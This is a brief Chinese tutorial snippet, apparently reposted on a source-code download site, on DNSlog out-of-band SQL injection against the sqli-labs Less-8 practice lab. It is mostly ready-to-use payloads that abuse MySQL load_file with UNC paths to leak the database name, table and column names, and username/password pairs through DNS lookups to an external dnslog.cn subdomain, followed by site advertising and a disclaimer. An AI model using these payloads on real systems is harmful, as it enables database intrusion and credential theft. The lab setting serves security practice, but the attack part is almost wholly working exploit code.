DNSlog外带数据注入
用到的网站
http://dnsbin.zhack.ca/
http://dnslog.cn/
http://ceye.io/
pyload:
查库
http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",database(),".kkc53r.dnslog.cn\\xxx.txt")) --+
查表
http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",(select group_concat(table_name SEPARATOR'-') from information_schema.tables where table_schema='security'),".kkc53r.dnslog.cn\\xxx.txt")) --+
查列
http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",(select group_concat(column_name SEPARATOR'-') from information_schema.columns where table_schema='security' and table_name='users'),".kkc53r.dnslog.cn\\xxx.txt")) --+
查数据(ps:子域名长度不能超过63个字符)
http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",(select concat(username,password) from users limit 0,1),".kkc53r.dnslog.cn\\xxx.txt")) --+
原创:https://www.panoramacn.com
源码网提供WordPress源码,帝国CMS源码discuz源码,微信小程序,小说源码,杰奇源码,thinkphp源码,ecshop模板源码,微擎模板源码,dede源码,织梦源码等。
专业搭建小说网站,小说程序,杰奇系列,微信小说系列,app系列小说
免责声明,若由于商用引起版权纠纷,一切责任均由使用者承担。
您必须遵守我们的协议,如果您下载了该资源行为将被视为对《免责声明》全部内容的认可-> 联系客服 投诉资源
评论抢沙发